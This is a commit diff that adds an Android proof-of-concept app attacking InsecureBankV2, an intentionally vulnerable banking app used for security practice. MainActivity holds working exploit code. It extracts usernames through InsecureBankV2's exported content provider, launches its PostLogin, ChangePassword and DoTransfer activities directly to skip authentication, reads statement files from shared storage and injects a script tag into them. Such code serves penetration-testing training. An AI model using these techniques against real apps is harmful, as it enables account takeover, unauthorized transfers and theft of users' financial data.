First release.

Author: bountu

.gitignore

@@ -0,0 +1,15 @@
+*.iml
+.gradle
+/local.properties
+/.idea/caches
+/.idea/libraries
+/.idea/modules.xml
+/.idea/workspace.xml
+/.idea/navEditor.xml
+/.idea/assetWizardSettings.xml
+.DS_Store
+/build
+/captures
+.externalNativeBuild
+.cxx
+local.properties

LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 Aybora Ünveren
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

app/.gitignore

@@ -0,0 +1 @@
+/build

app/build.gradle.kts

@@ -0,0 +1,43 @@
+plugins {
+    alias(libs.plugins.android.application)
+}
+
+android {
+    namespace = "com.ayboraa.ibv2poc"
+    compileSdk = 35
+
+    defaultConfig {
+        applicationId = "com.ayboraa.ibv2poc"
+        minSdk = 22
+        targetSdk = 34
+        versionCode = 1
+        versionName = "1.0"
+
+        testInstrumentationRunner = "androidx.test.runner.AndroidJUnitRunner"
+    }
+
+    buildTypes {
+        release {
+            isMinifyEnabled = false
+            proguardFiles(
+                getDefaultProguardFile("proguard-android-optimize.txt"),
+                "proguard-rules.pro"
+            )
+        }
+    }
+    compileOptions {
+        sourceCompatibility = JavaVersion.VERSION_11
+        targetCompatibility = JavaVersion.VERSION_11
+    }
+}
+
+dependencies {
+
+    implementation(libs.appcompat)
+    implementation(libs.material)
+    implementation(libs.activity)
+    implementation(libs.constraintlayout)
+    testImplementation(libs.junit)
+    androidTestImplementation(libs.ext.junit)
+    androidTestImplementation(libs.espresso.core)
+}

app/proguard-rules.pro

@@ -0,0 +1,21 @@
+# Add project specific ProGuard rules here.
+# You can control the set of applied configuration files using the
+# proguardFiles setting in build.gradle.
+#
+# For more details, see
+#   http://developer.android.com/guide/developing/tools/proguard.html
+
+# If your project uses WebView with JS, uncomment the following
+# and specify the fully qualified class name to the JavaScript interface
+# class:
+#-keepclassmembers class fqcn.of.javascript.interface.for.webview {
+#   public *;
+#}
+
+# Uncomment this to preserve the line number information for
+# debugging stack traces.
+#-keepattributes SourceFile,LineNumberTable
+
+# If you keep the line number information, uncomment this to
+# hide the original source file name.
+#-renamesourcefileattribute SourceFile

app/src/androidTest/java/com/ayboraa/ibv2poc/ExampleInstrumentedTest.java

@@ -0,0 +1,26 @@
+package com.ayboraa.ibv2poc;
+
+import android.content.Context;
+
+import androidx.test.platform.app.InstrumentationRegistry;
+import androidx.test.ext.junit.runners.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import static org.junit.Assert.*;
+
+/**
+ * Instrumented test, which will execute on an Android device.
+ *
+ * @see <a href="http://d.android.com/tools/testing">Testing documentation</a>
+ */
+@RunWith(AndroidJUnit4.class)
+public class ExampleInstrumentedTest {
+    @Test
+    public void useAppContext() {
+        // Context of the app under test.
+        Context appContext = InstrumentationRegistry.getInstrumentation().getTargetContext();
+        assertEquals("com.ayboraa.ibv2poc", appContext.getPackageName());
+    }
+}

app/src/main/AndroidManifest.xml

@@ -0,0 +1,36 @@
+<?xml version="1.0" encoding="utf-8"?>
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    xmlns:tools="http://schemas.android.com/tools">
+
+    <queries>
+        <package android:name="com.android.insecurebankv2" />
+    </queries>
+
+
+    <uses-permission android:name="android.permission.INTERNET" />
+    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE" />
+
+    <application
+        android:allowBackup="true"
+        android:debuggable="true"
+        android:dataExtractionRules="@xml/data_extraction_rules"
+        android:fullBackupContent="@xml/backup_rules"
+        android:icon="@mipmap/ic_launcher"
+        android:label="@string/app_name"
+        android:roundIcon="@mipmap/ic_launcher_round"
+        android:supportsRtl="true"
+        android:theme="@style/Theme.IBV2PoC"
+        tools:targetApi="31">
+        <activity
+            android:name=".MainActivity"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+        </activity>
+    </application>
+
+</manifest>

app/src/main/java/com/ayboraa/ibv2poc/MainActivity.java

@@ -0,0 +1,189 @@
+package com.ayboraa.ibv2poc;
+
+import android.content.Intent;
+import android.database.Cursor;
+import android.net.Uri;
+import android.os.Bundle;
+import android.os.Environment;
+import android.widget.Button;
+import android.widget.TextView;
+import android.widget.Toast;
+
+import androidx.activity.EdgeToEdge;
+import androidx.appcompat.app.AppCompatActivity;
+import androidx.core.graphics.Insets;
+import androidx.core.view.ViewCompat;
+import androidx.core.view.WindowInsetsCompat;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.FileReader;
+import java.io.FileWriter;
+import java.io.IOException;
+
+public class MainActivity extends AppCompatActivity {
+
+
+    private String usernameFound = "";
+
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+
+
+        EdgeToEdge.enable(this);
+        setContentView(R.layout.activity_main);
+        ViewCompat.setOnApplyWindowInsetsListener(findViewById(R.id.main), (v, insets) -> {
+            Insets systemBars = insets.getInsets(WindowInsetsCompat.Type.systemBars());
+            v.setPadding(systemBars.left, systemBars.top, systemBars.right, systemBars.bottom);
+            return insets;
+        });
+
+        Button providerButton = findViewById(R.id.btn_provider);
+        providerButton.setOnClickListener(v -> {
+        try {
+            Uri uri = Uri.parse("content://com.android.insecurebankv2.TrackUserContentProvider/trackerusers");
+            Cursor cursor = getContentResolver().query(uri, null, null, null, null);
+            if (cursor != null && cursor.moveToFirst()) {
+                StringBuilder data = new StringBuilder();
+                do {
+                    int nameIndex = cursor.getColumnIndex("name");
+                    if (nameIndex != -1) {
+                        String nameValue = cursor.getString(nameIndex);
+                        data.append("Name: ").append(nameValue).append("\n");
+                        if(usernameFound.equals("")) {
+                            TextView usernameText = (TextView) this.findViewById(R.id.txt_username);
+                            usernameText.setText("Account found:"  + nameValue);
+                            usernameFound = nameValue;
+                        }
+                    } else {
+                        data.append("Column 'name' not found\n");
+                    }
+                } while (cursor.moveToNext());
+                Toast.makeText(this, "Extracted Data:\n" + data.toString(), Toast.LENGTH_LONG).show();
+                cursor.close();
+            } else {
+                Toast.makeText(this, "No data found or query failed", Toast.LENGTH_LONG).show();
+                if (cursor != null) cursor.close();
+            }
+        } catch (Exception e) {
+            Toast.makeText(this, "Error: " + e.getMessage(), Toast.LENGTH_LONG).show();
+            e.printStackTrace();
+        }
+        });
+
+        Button postLoginButton = findViewById(R.id.btn_postlogin);
+
+        postLoginButton.setOnClickListener(v -> {
+                 Intent intent = new Intent();
+                 intent.setClassName("com.android.insecurebankv2", "com.android.insecurebankv2.PostLogin");
+            try {
+                startActivity(intent);
+            } catch (Exception e) {
+                String errorMsg = "Error launching PostLogin: " + e.toString();
+                Toast.makeText(this, errorMsg, Toast.LENGTH_LONG).show();
+                e.printStackTrace();
+            }
+        });
+
+        Button changePassButton = findViewById(R.id.btn_changepass);
+
+        changePassButton.setOnClickListener(v -> {
+                 Intent intent = new Intent();
+                 intent.setClassName("com.android.insecurebankv2", "com.android.insecurebankv2.ChangePassword");
+                 intent.putExtra("uname", "test");
+            try {
+                startActivity(intent);
+            } catch (Exception e) {
+                String errorMsg = "Error launching ChangePassword: " + e.toString();
+                Toast.makeText(this, errorMsg, Toast.LENGTH_LONG).show();
+                e.printStackTrace();
+            }
+        });
+        Button doTransferButton = findViewById(R.id.btn_dotransfer);
+
+        doTransferButton.setOnClickListener(v -> {
+                 Intent intent = new Intent();
+                 intent.setClassName("com.android.insecurebankv2", "com.android.insecurebankv2.DoTransfer");
+            try {
+                startActivity(intent);
+            } catch (Exception e) {
+                String errorMsg = "Error launching DoTransfer: " + e.toString();
+                Toast.makeText(this, errorMsg, Toast.LENGTH_LONG).show();
+                e.printStackTrace();
+            }
+        });
+        Button transferHistoryButton = findViewById(R.id.btn_history);
+
+        transferHistoryButton.setOnClickListener(v -> {
+            try {
+
+                String filePath = Environment.getExternalStorageDirectory() + "/Statements_" + usernameFound + ".html";
+                File file = new File(filePath);
+                if (file.exists()) {
+                    StringBuilder content = new StringBuilder();
+                    BufferedReader reader = new BufferedReader(new FileReader(file));
+                    String line;
+                    while ((line = reader.readLine()) != null) {
+                        content.append(line).append("\n");
+                    }
+                    reader.close();
+                    Toast.makeText(this, "Transfer History:\n" + content.toString(), Toast.LENGTH_LONG).show();
+                } else {
+                    Toast.makeText(this, "No statements file found for " + usernameFound, Toast.LENGTH_LONG).show();
+                }
+
+            } catch (Exception e) {
+                Toast.makeText(this, e.toString(), Toast.LENGTH_LONG).show();
+                e.printStackTrace();
+            }
+        });
+
+
+        Button javascriptButton = findViewById(R.id.btn_javascript);
+
+        javascriptButton.setOnClickListener(v -> {
+            try {
+
+                String filePath = Environment.getExternalStorageDirectory() + "/Statements_" + usernameFound + ".html";
+                File file = new File(filePath);
+                if (file.exists()) {
+                    try {
+                        // Read the file content
+                        FileReader fileReader = new FileReader(file);
+                        StringBuilder content = new StringBuilder();
+                        int character;
+                        while ((character = fileReader.read()) != -1) {
+                            content.append((char) character);
+                        }
+                        fileReader.close();
+
+                        content.append("<script>alert(\"Injected!\")</script>");
+
+                        // Write the modified content back to the file
+                        FileWriter fileWriter = new FileWriter(file);
+                        fileWriter.write(content.toString());
+                        fileWriter.close();
+
+                        // Notify the user
+                        Toast.makeText(this, "File modified successfully!", Toast.LENGTH_LONG).show();
+                    } catch (IOException e) {
+                        e.printStackTrace();
+                        Toast.makeText(this, "Error modifying the file.", Toast.LENGTH_LONG).show();
+                    }
+
+                } else {
+                    Toast.makeText(this, "No statements file found for " + usernameFound, Toast.LENGTH_LONG).show();
+                }
+
+            } catch (Exception e) {
+                Toast.makeText(this, e.toString(), Toast.LENGTH_LONG).show();
+                e.printStackTrace();
+            }
+        });
+
+
+
+    }
+}